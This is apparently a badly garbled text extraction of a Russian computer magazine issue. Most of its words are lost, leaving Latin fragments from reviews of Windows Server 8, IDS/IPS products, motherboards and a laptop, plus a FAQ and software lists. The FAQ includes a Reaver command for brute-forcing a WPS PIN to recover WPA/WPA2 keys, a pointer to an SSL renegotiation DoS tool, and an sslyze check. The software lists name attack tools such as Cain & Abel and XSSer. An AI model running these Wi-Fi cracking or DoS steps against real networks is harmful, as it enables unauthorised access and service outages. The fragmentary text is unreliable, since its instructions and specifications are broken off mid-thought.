shm        /dev/shm  tmpfs   nodev,nosuid           0 0
/dev/sda1  swap      swap    defaults               0 0
/dev/sda2  /         ext4    defaults               0 1
/dev/sda3  /www      ext4    defaults,noexec,nodev  0 1
/dev/sda4  /var      ext4    defaults,noexec,nodev  0 1
tmpfs      /tmp      tmpfs   defaults,noexec,nodev  0 0

/www
,
- www, .
/var /tmp .
, ,
.

6.
- .
ArchLinux
( , ) sshfs. :
1. .
2. sshfs.
3. (,
nginx, PostgreSQL, SSH):

9. /mnt:
# mount /dev/sda2 /mnt
# mkdir /mnt/www /mnt/var
# mount /dev/sda3 /mnt/www
# mount /dev/sda4 /mnt/var

10. :
# mount /dev/sdb1 /media
# cd /mnt
# tar -xzf /media/root.tar.gz

11. :
# chroot /mnt
# grub-install /dev/sda1

12. :
title  Arch Linux
root   (hd0,1)
kernel /boot/vmlinuz30 root=/dev/sda6 ro
initrd /boot/kernel30.img


# pacman -Sy
# pacman -S nginx postgresql ssh

4. , , , nginx, PostgreSQL SSH, :


# pacman -Ql nginx postgresql ssh

5. sshfs:
# sshfs /mnt
# for file in `pacman -Ql nginx | cut -d ' ' -f 2`; do\
cp $file /mnt/$file;\
done

! ,
, ,
.

7.
,
. , .
: , . z

grinder (grinder@synack.ru)

INFO

WWW


Win8


2012 .

2013-.


Windows Server
msdn.microsoft.
com/en-us/windowsserver.

Windows
Server 8


.
Win2k8 Server
Core

MS SQL Server
Exchange.

, Win8

.
Hyper-V
Replica

VIDEO



,

Windows 8
Developer Preview.

WARNING
Win8

64-
.


WINDOWS SERVER 8
,
2009 ,
Win2k8,
.
,
,
,
.
Developer Preview,
.

Win8 Server Manager


GUI, , PowerShell

.
, ( )
. ,
. ,
, .
Win8
: , ,
.

WINDOWS 8
Win2k8 Server Core ,
GUI (
VM) .
:
GUI , .
Win8 : GUI
. GUI , (Features
On Demand) GUI IE
Server Manager MMC.
.
Win8 ,
, .

Win2k8 PowerShell, ,
.
Win8 PowerShell, ,
, . 2300 ( PS1
130, PS2 230). IntelliSense
PS
. ,
. ,
API. - PS


REST JSON. ,
Win8 RSAT Server Manager PS, PS.

.
WMI (Windows Management
Instrumentation) Win8 ,
SMI-S, WSMAN DCOM. ,
WMI-.
Win2k8 . ,
R2 . Win8
.
, Dashboard
, . , :
Computer Management PowerShell.
,
, .
Server Manager Metro,
wide-. ,
,
. , .
, .
: / RDS.
() VDI.
Notification.

HYPER-V

Hyper-V 3.0,
. 160
CPU ( ) 2 ,
VM 32 vCPU 512 .
CPU
, VM, . , Win8,
63 4000 VM, Live Migration,
Multi-Channel SMB ( -

ADAC



).
, ,
Win2k8,
. ,
NUMA (Non-Uniform Memory Access) VM.
, Hyper-V . WHEA (Windows Hardware Error Architecture)
VM , .
, , VM
, /,
.
Hyper-V Replica
.
.
VHDX
, .
2 ( 16 ),
.
VM. BitLocker,
.


Win8 , . NIC teaming
32 ( ) (link aggregation),
,
.
. Control Panel

( ), Win8 IP- IPAM (IP Address
Management). , IP- ( ),
.
IP-.


DYNAMIC ACCESS CONTROL


DAC ,


- .

VM, .
SMB 2.2 Multi-Channel
SMB,

.
SMB
.
,
. , , Fibre Channel VM SMB.
(, ) ,
.
BranchCache .
, ,
,
. ,
.
DHCP Guard, DHCP- ,
DHCP.
DHCP failover. DNSSEC
DNS-, ,
DNS Spoofing.

(Direct Access VPN)
Unified Remote Access. Direct Access (
, ][_09_2011)
. DMZ,


.
ACL
.
,
.
,
.
AD
.
ACL ,
. ACL . , ,
, VPN.
.
.
.

ACTIVE DIRECTORY

NAT'.
, .
Remote Desktop
Service. TCP UDP 10 % . RemoteFX,
Win2k8R2SP1,
RDP- , DirectX.
Win8 RemoteFX, GPU. ,
VDI . ,
, . , ,
.
NFS .
,
*nix-.


,
, .
storage pools, ,
VDI, storage spaces .

storage pool. , SATA- SAS-.
.
CHKDSK ,
. Win8 CheckDisk
- . .
,
, , . , Win8,
,


, ,
Active Directory. ,
, .
Active Directory Domain Services Server Manager
, ,
DCPROMO.

/ Win2k3 Win8.
Win2k8R2 Active
Directory (Administrative Center, ADAC),
PowerShell. , ,
,
MMC. Win8 ADAC .
(, FGPP fine-grained password policies,
ADSI Edit). PowerShell,
. AD
.
VM , . ,

ID , ID
, Sysrep ,
.

IIS
- IIS 8.0 Windows Azure,
.
IIS CPU. ,
.
IIS WebSockets
- TCP.
, , HTML5.
SSL-.
, .
PowerShell.

, , .
, , ,
. z
SYN/ACK

grinder (grinder@tux.in.ua)

IT-
IDS/
IPS

,
,

.
IDS/IPS,
,
.

INFO
Mod_Security GreenSQL-FW

,
][_12_2010.
iptables

,

, ][_12_2010.

WWW
hlbr.sf.net IPS
Hogwash Light BR.
cipherdyne.org/fwsnort
Fwsnort.

IDS/IPS
IDS IPS,
. , IDS (Intrusion Detection
System) , .
, IDS , , , . . ,
(IP, ), IDS
( OSI),
. . APIDS (Application protocolbased IDS),
. PHPIDS (phpids.org), -


PHPIDS PHP-


PHP-, Mod_Security,
- (Apache), GreenSQL-FW, SQL (. ][_12_2010).
NIDS (Network Intrusion Detection System) , DPI (Deep Packet
Inspection, ).
, , .
. OpenDPI (www.opendpi.org) Fwsnort
(cipherdyne.org/fwsnort).
Snort
iptables.
, DPI ,
. IDS
(alert) .
,
. ,
. IPS (Intrusion
Prevention System, ).
IDS
, TCP RST.
, IPS
(SPAN), . , Hogwash Light BR (hlbr.sf.net), OSI.
IP-, , .
, , ,
. IT
IPS (.
][_08_2009),
, . , . HIPS, , , ,
.
: , ,
.
, , . IDS,
(
SIM Security Information Management).

Suricata Snort, Snorby

OpenSource- Prelude Hybrid IDS,
OpenSource IDS/IPS
(
,
Linux *BSD).

. IDS/IPS-.

SURICATA
: OISF (Open Information Security Foundation).
Web: www.openinfosecfoundation.org.
: .
: Linux, *BSD, Mac OS X, Solaris, Windows/Cygwin.
: GNU GPL.
- IDS/IPS 2010- .

. Suricata OISF,
, US
Department of Homeland Security.
1.1, 2011 .
GPLv2,
GPL- , .
,
. ,
1.0, 1.1 70%.
IDS , Snort,
/ , . Suricata
. ,
Snort (
24 CPU 128 ). '--enable-cuda'
GPU.
IPv6 ( Snort
'--enable-ipv6'),
: LibPcap, NFQueue, IPFRing, IPFW. ,
, , .
( Linux
IPS
netlink-queue libnfnetlink).

IBM - GTOC X-Force



,
.

, : , IDS/
IPS, , -, . UTM (Unified
Threat Management, ).
UTM Trend Micro Deep Security (ru.trendmicro.com), Kerio Control (kerio.ru), Sonicwall Network Security (sonicwall.com), FortiGate Network Security Platforms and
Appliances (fortinet.com)
Linux, Untangle Gateway, IPCop Firewall, pfSense (
, ][_01_2010).

(IP, TCP, UDP, ICMP, HTTP, TLS, FTP, SMB, SMTP


SCTP),
( Snort),
. Ivan Ristic, Mod_security, HTP, Suricata HTTP.
.
,
. , -,
, Snort (Barnyard,
Snortsnarf, Sguil . .), Suricata.
. HTTP
Apache.
Suricata (rules). ,
, :
Sourcefire VRT ( Oinkmaster), OpenSource
Emerging Threats (hemergingthreats.net) Emerging Threats Pro
(emergingthreatspro.com).
,
, . rules, .
: (pass, drop, reject alert),
(IP/ ) ( ). ( flowint),
, , . .
,
, , Snort , .
IP Reputation ( SensorBase Cisco, .
Cisco ][_07_2011).
, , Suricata ,

SURICATA
, SNORT,


-

Samhain ,

Snort, -
.
, .
,

. Smooth-sec (bailey.st/blog/smooth-sec), Suricata.

SAMHAIN
: Samhain Labs.
Web: www.la-samhna.de/samhain.
: .
: Unix, Linux, Windows/Cygwin.
: GNU GPL
OpenSource- Samhain
IDS, . ,
, :

;
;
/ ;
;
SUID .


( ),
. Samhain
, ,
.
(TCP, AES, )
(yule),
(MySQL, PostgreSQL, Oracle). , ,
.
: e-mail ( ), syslog, - (),
Nagios, .
.
Linux, , Samhain
Windows.

STONEGATE INTRUSION PREVENTION SYSTEM


: StoneSoft Corporation.
Web: www.stonesoft.com.
: -, VMware.
: 32/64- Windows 2k3/Vista/7/2k8R2, Linux (CentOS,
RHEL, SLES).
: .

,
.
: IPS, DDoS- 0day-, -,
. . StoneGate
IPS , spyware, (P2P, IM ). -
,
.
AET (Advanced Evasion Techniques).
Transparent Access Control

. , .
-.

IPS. StoneGate IPS
, SIM/SIEM-, .

StoneSoft StoneGate Firewall/VPN StoneGate SSL VPN.
(StoneGate Management Center), :

Management Server, Log Server Management Client.


IPS
, . Java,
Windows Linux.
StoneGate IPS , VMware.

. , , -
.

IBM SECURITY NETWORK INTRUSION


PREVENTION SYSTEM
: IBM.
Web: www.ibm.com/ru.
: -, VMware.
: .
, IBM, ,
0day-.
IBM Security,
PAM (Protocol Analysis Module),
-

Suricata , Snort


(Proventia OpenSignature) .
PAM 218
( VoIP, RPC, HTTP . .) ,
DOC, XLS, PDF, ANI, JPG, ,
. 3000 , 200 DoS.

IP,
. Virtual
Patch
, .
.
P2P, IM, ActiveX-,
VPN . . . DLP, ,
.
( , ),
.
-, IBM
Web Application Security,
: SQL injection, LDAP injection,
XSS, JSON hijacking, PHP file-includers, CSRF . .
, ,
( , tcpdump), , .
, IP- VLAN. High
Availability ,
IPS, ,
, .
RAID, ,
. ,
-, (
).
IBM Security SiteProtector, ,
.

IDS/IPS?
IDS/IPS,
:

(
, )
.
.
IPS
, IDS.
.
IPS
.
, IP
().
, .
IPS- ,
,
.


StoneGate IPS

MCAFEE NETWORK SECURITY PLATFORM 7


: McAfee Inc.
Web: www.mcafee.com.
: -.
: .
IntruShield IPS, McAfee,
IPS-. McAfee Network Security Platform 7 (NSP).
NIPS
,
,
, . McAfee Global Threat Intelligence,
,
, , IP- URL- . NSP
, 0day- DDoS,
.
IDS/IPS ,
. NSP
,
VM, VM . Reflex
Systems, VM
.
1100 ,
OSI. -
.
NIPS, McAfee IPS Host Intrusion
Prevention for Desktop,
, ,
,
, .

.
, ,
, , ,
.
, ,
OpenSource- Snort , , .
Suricata , , . z


FERRUM


SANDY BRIDGE


AMD A75

! ,
Intel
AMD
. , , ,

86-.

, , ,
, .
AMD Llano
AMD Dual Graphics,
,
CrossFireX. ,
,
86-, AMD Llano Intel
Sandy Bridge. ,
AMD A8/A6
.


ASUS F1A75-V PRO.



: ! , ,

.
?
, AMD
A8-3850 4000 .
.
4 2400
( , 2400 , )
7000 .
.
--
15 000 . ,
!

:
: AMD A8-3850, 2,9
: Scythe NINJA 3
: Corsair
CMGTX7 @2400 , 1x 4
SSD: Kingston SVP100ES2/64G,
64
: HIPER TYPE K1000,
1000
: Windows 7


ASROCK A75 PRO4


, . ASRock A75 Pro4.
!
, / BIOS. ,
.
, - .
105 SATA. ( BIOS), .
EZ OC
Mode . , , : BIOS ,
CPU 3300/3400/3500/3600 2000/2200/2500 .
- ! ---! BIOS 1.80
. , ,
ASRock A75 Pro4 . ,
.

3500
.

ASROCK A75
EXTREME6
, . ,
ASRock A75 Extreme6. , Extreme6
.
Intel
P67 Express. AMD. , ASRock
.
. ASRock A75
Extreme6 :
PCI Express x16. , CrossFireX 8 + 8 + 4.
ASRock A75 Extreme6 . :
. 112
112 29 = 3248 , 112 18,66=2089,92
. EZ OC Mode .

4000
.

AMD Llano . , AMD Llano



.


.
,
.
. ,


AMD Llano
.
GIGABYTE
, , AMD A8-3850,
3600 , Crysis 2.
, Crysis 2!

.
, Crysis 2
1920 x 1080 -

, DirectX 9. 25 FPS.
. 3DMark Vantage
performance. ,



, . .


ASUS F1A75-I DELUXE


ASUS. F1A75-I Deluxe Mini-ITX PCI
Express x16. - .
. Deluxe
Wi-Fi Bluetooth.
, ASUS F1A75-I Deluxe ,
HTPC . :
.
UEFI BIOS .
- 118 . 118 29 = 3422 ,
118 18,66 = 2201,88 .
. ,
. , PCI Express x16. , ,
, , Scythe Big Shuriken, , , .

n/a

ASUS F1A75-V PRO


ASUS F1A75-V PRO
.

AMD Llano. , ,
!
140 .
140 29 = 4060 , 140
18,66=2612,4 . , , .
.

. , 25 FPS Crysis 2 !
, .
, AMD Llano , PCI Express x16,
16 + 4.
PCI Express x1 PCI.
SATA- USB- ASUS F1A75-V PRO
.

4000
.

ASRock A75 Pro4

ASUS F1A75-I
Deluxe

ASRock A75 Extreme6

FM1
10662400
1x PCI Express x16, 1x PCI Express x4, 2x
PCI Express x1, 3x PCI
5x SATA 3.0
7.1 CH HD Realtek ALC892
Realtek RTL8111E, 10/100/1000 /

FM1
10662400
1x PCI Express x16, 1x PCI Express x8, 1x PCI
Express x4, 1x PCI Express x1, 3x PCI
8x SATA 3.0
7.1 CH HD Realtek ALC892
Realtek RTL8111E, 10/100/1000 /

1x D-Sub, 1x DVI, 1x HDMI, 4x USB 3.0, 2x


USB 2.0, 1x eSATA, 1x FireWire, 1x S/PDIF,
1x RJ-45, 1x PS/2, 5x audio

1x D-Sub, 1x DVI, 1x HDMI, 4x USB 3.0, 2x USB 2.0, 1x DisplayPort, 1x DVI, 1x HDMI, 2x USB 3.0, 4x
1x eSATA, 1x FireWire, 1x S/PDIF, 1x RJ-45, 1x
USB 2.0, 1x eSATA, 1x FireWire, 1x S/PDIF, 1x RJPS/2, 6x audio
45, 1x PS/2, 1x Bluetooth, 3x audio

ATX

ATX

:
:
:
:
:
:


FM1
10661866
1x PCI Express x16
5x SATA 3.0
7.1 CH HD Realtek ALC892
Realtek RTL8111E, 10/100/1000 /; Wi-Fi
802.11 b/g/n

Mini-ITX


GIGABYTE GA-A75M-D2H
GIGABYTE GA-A75M-D2H.
,
mATX. -
DIMM . , .

.
CPU. GIGABYTE GA-A75M-D2H
SATA-.
. .
, BIOS Award.
, M.I.T.
! , , ,
GIGABYTE GA-A75M-D2H BIOS
.
CPU.
128 128 28 = 3584 ,
128 18,66 = 2388,5 .
134 .

3000
.

MSI A75MA-G55
,
MSI. MSI
A75MA-G55 , , , Military Class
II. ,
.
. MSI A75MA-G55 .
. BIOS MSI A75MA-G55, , . .
, 128 .
, ,
. ,
. , 115
. 115 29 = 3335
, 115 18,66 = 2145,9 .

3000
.


ASUS F1A75-V
PRO

GIGABYTE GAA75M-D2H

MSI A75MA-G55

FM1
10662250
1x PCI Express x16, 1x PCI Express x4,
2x PCI Express x1, 3x PCI
7x SATA 3.0
7.1 CH HD Realtek ALC892
Realtek RTL8111E, 10/100/1000 /

FM1
10662400
1x PCI Express x16, 1x PCI Express x4,
1x PCI Express x1, 1x PCI
6x SATA 3.0
7.1 CH HD Realtek ALC889
Realtek RTL8111E, 10/100/1000 /

FM1
10661600
1x PCI Express x16, 1x PCI Express x4, 1x
PCI Express x1, 1x PCI
6x SATA 3.0
7.1 CH HD Realtek ALC887
Realtek RTL8111E, 10/100/1000 /

1x D-Sub, 1x DisplayPort, 1x DVI,


1x HDMI, 4x USB 3.0, 2x USB 2.0, 1x
eSATA, 1x FireWire, 1x S/PDIF, 1x RJ45, 1x PS/2, 6x audio
ATX

1x D-Sub, 1x DVI, 1x HDMI, 2x USB 3.0,


4x USB 2.0, 1x S/PDIF, 1x RJ-45, 1x
PS/2, 3x audio

1x D-Sub, 1x DVI, 1x HDMI, 2x USB 3.0, 4x


USB 2.0, 1x RJ-45, 1x PS/2, 6x audio

mATX

mATX


: ,
, , .
,
, -
BIOS, .
.


ASUS F1A75-V PRO. GIGABYTE GA-A75M-D2H

.
GIGABYTE GA-A75-UD4H
. z


40 000
.

:
: 17.3", 19201080
: Intel Core i5-2410M, 2.4
: DDR3-1333, 6
: AMD Radeon 6650M, 2
: 500
: Gigabit LAN,
Wi-Fi , Bluetooth 3.0
: 3D-
: Windows 7 64
: 415.8276.1x32.3 37.9
: 2.9

:
WinRAR: 2369 /
Super Pi (16M): 330
PCMark05: 8788
3DMark Vantage: 4431
Resident Evil 5: 59 FPS
Call of Juarez: 21.5 FPS
Alien VS Predator: 13 FPS
Heaven Dragon: 12 FPS
Battery Eater: 67

SAMSUNG RF712-S01
!

.
. ,
. .
- . , Samsung RF712
, , 3D!


,
,

.
, -,
. ,
WinRAR,
Super Pi.
Futuremark: PCMark'05 3DMark Vantage.
Resident Evil 5,
Call of Juarez, Alien Vs. Predator Heaven.


12801024 .

Battery Eater .

.
Intel Core i5-2410M
AMD Radeon 6650M.

Samsung RF712
, . , .
.
. ,

. ,
3D- ,
,
. , 3D .
, Samsung RF712 . : Wi-Fi 802.11n, Blu-Ray, USB 3.0 Bluetooth
3.0.
. Samsung
RF712 , ,

Samsung, RF712 .
,
. , USB-
,
. . ,

,
Samsung RF712
.

Samsung RF712
. ,
. , ,

. ,
! z


UNITS / FAQ UNITED

(twtitter.com/stepah)

FAQ United

FAQ@REAL.XAKEP.RU

,

SSL (,
#11/11
), SSL-.
THC-SSL-DOS (WWW.THC.ORG/THC-SSL-DOS)
. ?
THC !

DDoS SSL-
A . : SSL- 15
, . , THC-SSL-DOS (www.thc.org/thc-ssl-dos)
,
.
TCP-, SSL
handshakes . ,
,
DDoS ,

(client-initiated renegotiations).
sslyze (code.google.com/p/sslyze):
python sslyze.py --reneg www.server.com:443

client-initiated
renegotiations Honored, ,
. ,
SSL ( 2003 ).

, ,

Secure Renegotiation, , . sslyze
SSL:
,
(SSLv2, SSLv3 TLSv1)
.
-,

(
,

. .). :

2,5-
( )

3,5-
?


2,5", 3,5-
,
.
2,5" ,
, SAS (Serial
Attached SCSI) .
2,5- SATA-
, HDD Western Digital
VelociRaptor,
3,5-

2,5- ,
. .
,

, ,

- . ,
. -
3,5- ,

.

,
WINDOWS.
,
.

LINUX OS X,
?

UNIX-
:

/var/at/tabs/<username>
/etc/ttys
/etc/profile
/etc/bashrc
/etc/csh.cshrc
/etc/csh.login

5 : DROPBOX
Dropbox . ?
,

(
Dropbox),
99,9 % (
Amazon S3) , ?


, ,
.
(HTML, CSS, JavaScript)
Public, public-
(, index.html) :
http://dl.dropbox.com/u/21310/site/index.html.

, ,

index.html. . Dropbox ,
, . !

bit.ly .


/etc/rc.common
~/.profile
~/.bashrc

OS X :

WI-FI-,
WPA/WPA2?
,


.

( ),
. WPS
-,
WPS PIN,
, , ,
WPA/WPA2, , , !
,
. .
Reaver (bit.ly/uAaS67),
WPS. :
BSSID (
MAC-) (
), :

/System/Library/LaunchDaemons
/System/Library/Extensions
/Library/LaunchDaemons
/System/Library/LaunchAgents
/Library/LaunchAgents
/Library/StartupItems
/Library/Preferences/loginwindow.plist
~/Library/LaunchAgents
~/Library/Preference/loginitems.plist
~/Library/Preference/loginwindows.plist

,

, , . ,
WPA/
WPA2 ,
,
, ,
WPS. ,
Wi-Fi Protected Setup ,


WPA2. ,


,
,
.
PIN-.
,

, , ,
user mode.

:
/System/Library/Caches/com.apple.kernelcaches
/System/Library/Filesystems/AppleShare/
/System/Library/Filesystems/hfs.fs/Encodings/


EFI (
Mac', Intel).

SSD .
,
.
, WINDOWS 7
SSD,
- . ,

.
, SSD
?

,

. Windows 7

,
(, Superfetch
Application launch prefetching).
,

reaver -i mon0 -b 00:01:02:03:04:05


, ,
.
,
WPS ,
!
: bit.ly/uAaS67. reaver,
PoC (bit.ly/u3mTXF), ,

Wi-Fi-.

,
,
CMS droppages.com.
(, demo.droppages.com.zip),
your_site.droppages.com.
.


WPS PIN. ,
, WPA2!

:
Content (
), Public ( )
Templates (HTML-,
).
(
Content)
.


server1@droppages.com.
HTML.
.



,
EnableSuperfetch
EnablePrefetcher
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters. swap-.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Memory Management\:
ClearPageFileAtShutdown 0.
, ,
TRIM,
, .
:
fsutil behavior query DisableDeleteNotify

DisableDeleteNotify,
, TRIM .
. , TRIM ( RAID MSAHCI).
PYTHON

WINDOWS-?

Python'
.
pywinauto (code.google.com/p/pywinauto), GUI-.

:

from pywinauto import application

app = application.Application.start("notepad.exe")
app.Notepad.MenuSelect("Help->About Notepad")
app.AboutNotepad.OK.Click()
app.Notepad.Edit.TypeKeys("pywinauto Works!", with_spaces=True)


(pywinauto.googlecode.com/hg/pywinauto/docs/index.html). :
1. .
2. python.exe setup.py install.
3. PIL (www.pythonware.com/products/pil/index.htm).
4. elementtree (effbot.org/downloads).


,
-

,
- . ?


ZoomIt (bit.ly/uULr0d) .
.
,
- .


LINUX,
- SSH?

,

SSH- ,
.

.
,
-
( 22). iptables. :

iptables -P INPUT DROP


iptables -A INPUT -m state \
--state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp -m tcp \
--dport 22 -m state --state NEW \
-m recent --set --name SSH
iptables -A INPUT -p tcp -m tcp \
--dport 22 -m state --state NEW \
-m recent --update --seconds 60 \
--hitcount 4 --rttl --name SSH -j DROP
iptables -A INPUT -p tcp -m tcp \
--dport 22 -m state --state NEW -j ACCEPT

,
, : IP
/proc/net/ipt_recent/SSH.
( ,

GIT&&GITHUB: )

GIT.
,
COMMIT'
WINDOWS
VIM.
-
?

WPA2- WPS
PIN. !

GitPad (https://github.com/github/gitpad).
,
,
.
, , Notepad++.
Git':

git config --global core.editor \
"'C:\\Program Files (x86)\\Notepad++\\notepad++.exe' -multiInst -notabbar -nosession -noPlugin"


,

.
?

,

open.dapper.net Yahoo.
:
1. URL-, . Dapper.net

.
2.
, , , .
, , variable 1
,
.
3. ,
, . , ,
,
,

. .
4. .

RSS
RSS- ( ,

RSS-), , ,
XML
.

, dapper.net
. z
DDoS SSL-


>Net
Comodo Unite 3.0.2.0
FtpUse 2.0
Image Picker 1.0.0
Insync 0.9.5
Joukuu Lite 1.3.3.3
KumoSync 1.1.1
Mikogo 4.0
MultiMi 0.9.29
Remote Desktop Manager
Remote Potato 1.0.6
The E-Mail Client 1.03

>Multimedia
Antenna 1.5.0
Artweaver Free 3.0.1
Avidemux 2.5.5
CamStudio 2.0
GreenForce-Player 1.11
Jing
Moo0 AudioTypeConverter 1.24
Nepflex Screen Recorder 1.4.0.4
PhotoLikr 1.2
Screenpresso 1.3.0
Sublight 3.0.0
Trout 1.0.6
UMPlayer 0.98
VideoSpin 2.0
VirtualDub 1.10.1
YACReader 0.4.0

>Misc
7Files 0.3
8Start 3.0
bcWebCam 2.1.0.3
Cathy 2.28.3
Clipboard Saver
Coolbarz 0.1.6.7
Dictation Pro 0.91
Executor 0.99.11
FocusWriter 1.3.5.1
gBurner Virtual Drive 3.1
Gizmo Toolbar 2.5.0
NppDocShare 0.1
Soda 3D PDF Reader
Tiles 0.98
WindowSlider 0.3
XWidget 1.2.3

>>WINDOWS
>Development
Adventure Game Studio 3.2.1
Batch Compiler 1.0
BinScope Binary Analyzer 0.0.1
dotPeek 1.0
Expert Debugger 3.2
FMOD Ex 4.38.05
JoeBlogs 1.0
MiniFuzz 1.5.5.0
NVIDIA Parallel Nsight 2.1
NVIDIA PerfKit 6.70
PeStudio 3.54
QuickPHP 1.14.0
QuickSharp 2.0
Resource .NET 3.0
SQL Prompt 5.2
XDebug 2.1.2

>Net
Adchpp 2.8.0
Ahcpd 0.53
Babel 1.3.0
Bitflu 1.39
Clawsmail 3.8.0
Deluge 1.3.3
Emesene 2.11.11
Getmail 4.24.0
Gnunet 0.9.0
Jitsi 1.0b1
Movgrab 1.1.5
Mulk 0.6.0
Opera 11.60
Pidgin 2.10.1
Quamachi 0.6.0
Quban 0.2.2
Surrogafier 1.9.1b
Xplico 0.7.0
>Security
Androguard 1.0-rc1
Android WebContentResolver
Angryip 3.0b6
Artillery 0.2 Alpha
Autopsy 3.0.0b2
Bokken 1.5
CSRFScanner 1.0
ELFkickers 3.0
Ettercap 0.7.4
Fwsnort 1.6.1
Gnutls 3.0.9
Keepass 2.17
ModSecurity 2.6.3-rc1
Opendnssec 1.3.4
Radare2 0.9
Stunnel 4.50

>>UNIX
>Desktop
Bluetile 0.6
Bombonodvd 1.2.0
Calibre 0.8.31
Cinepaint 1.0
Darktable 0.9.3
Dupeguru_me 6.2.0
Ffmpeg 0.9
Gnomesubtitles 1.2
Lives 1.4.9
Nightingale 1.8.1
Pdfmasher 0.6.3
Qtractor 0.5.2
Qx11grab 0.2.6
Razor-qt 0.4
Smillaenlarger 0.9.0

>>MAC
ArgoUML 0.34
CoRD 0.5.5
DesktopShelves 1.4.2
DiffMerge 3.3.2
dupeGuru ME 6.2.0
EasyFind 4.8.1
Folx 2.0.1028
keka 0.1.4.3
Lion Secrets 1.2.0
Mini vMac 3.2.3
Mixxx 1.9.2
ShareIt 1.0
Soundcloud Downloader 2.0
Task Coach 1.3.3
Time Out 1.6.3
Vox 0.3 beta 1
XnViewMP 0.39

>X-Distr
Linux Mint 12
Pfsense 2.0.1

>System
Bochs 2.5
Cemosshe 11.12.06
Debreate 0.7.7
Kmod 1
Linux 3.1.6
Nxlog 1.2.494
Pam_mount 2.13
Powertop 1.8
Qemu 1.0
Rpmerizor 2.6
Rtirq 20111007
Sali 2.4.11
Tpe-lkm
Xf86-video-ati 6.14.3
Zsh 4.3.14

>Server
Apache 2.2.21
Asterisk 10.0.0
Bind 9.8.1-p1
Cups 1.5.0
Dhcp 4.2.3-p1
Dovecot 2.0.16
Freeradius 2.1.12
Lighttpd 1.4.30
Mysql 5.5.19
Nsd 3.2.9
Openldap 2.4.28
Openvpn 2.2.2
Postfix 2.8.7
Postgresql 9.1.2
Pure-ftpd 1.0.35
Samba 3.6.1
Sendmail 8.14.5
Snort 2.9.2
Sqlite 3.7.9
Squid 3.1.18
Syslog-ng 3.3.3
Vsftpd 2.3.5

>Devel
Bluefish 2.2.0
Buildbot 0.8.5
Codelite 3.0.0.5041
Eigen 3.0.4
Eric 5.1.7
Fastutil 6.4.2
Getid3 1.9.2
Gral 0.8
Ideaic 11
Lazarus 0.9.30.2
Libqrencode 3.2.0
Libutillery 1.7.0
Llvm 3.0
Odbcpp 1.6
Pantheios 1.0.1b213
Sourcesquare 23122011
Tcpdf 5.9.141
Text-tokenizer 0.4.5
Ultimatepp 4193
>Games
Eternallands 1.9.2
Gigalomania 0.21
Pioneer alpha17

The Mole 0.2.6


XSSer v1.6b
XssScanner 1.1

Sweethome3d 3.3
Synfig 0.63.03
Veusz 1.14

>System
AllOff 3.4
BlueStacks
Clipboardic 1.10
D7 4.9.6
DiskAlarm 1.2.4370
DisplayFusion 3.4.0
Gow 0.5.0
iCare Data Recovery Professional
iPadian
OSFMount 1.5.1008
Patch My PC 2.0.6.3
RMPrepUSB 2.1.630
SaBackup 0.9.3.3
Track Folder Changes 1.1
Win7AudioSwitcher
WinArchiver Virtual Drive 2.7

>Security
Activity Monitor 1.05
Artillery 0.2
Autopsy 3.0.0b2
Cain & Abel 4.9.43
Comodo Cleaning Essentials 1.6
Echo Mirage 1.2
Ettercap 0.7.4
Heimdal
Identity Finder
Immunity Debugger 1.84
IOCTL Fuzzer 1.3
MysqlPasswordAuditor 1.0
Net2SharePwn 1.0b
NTO SQL Invader
oSpy 1.10.4
Radare2 0.9
RainbowCrack 1.5
Scrapy 0.14
SSLyze 0.3
The Mole 0.2.6
Toolwiz Care 1.0
Wavsep 1.1.0
WeBaCoo 0.2
WinAPIOverride32 5.5.3
XSSer v1.6b

Tixati 1.74
WebReader 0.8.80 beta
WLAN Optimizer 0.21
Yoono desktop 1.8.16


WWW2
Z-MUSIC
z-music.org
- prostopleer.com. Z-music
,
. - ,
. , prostopleer.
com, ,
. Z-music ,
, , ,
Maximum.

BITLET
bitlet.org
-, .
, . torrent- URL
, .
BitLet Java,
Java VM. , , .
- BitTorrent torrific alpha (www.torrific.com). , .
BitTorrent-

SHOWMYCODE
www.showmycode.com
CLASS-, Java-?
PHP-,
Zend Guard? ActionScript- swf-?
.NET- #, Visual Basic .NET, J#,
Visual C++ .NET? ShowMyCode. , Java Decompiler, SWF Decompiler, Dis#
stand-alone-,
. ShowMyCode
QR-.

INTERVIEW STREET
www.interviewstreet.com
. 11 (C++, Python, PHP, Java .
.), . , Interview
Street IT- (, Facebook Amazon),
. . Interview Street
, , $10000
.
.
-


: (exeypanteleev.com), : .

UNITS / GEEK ART
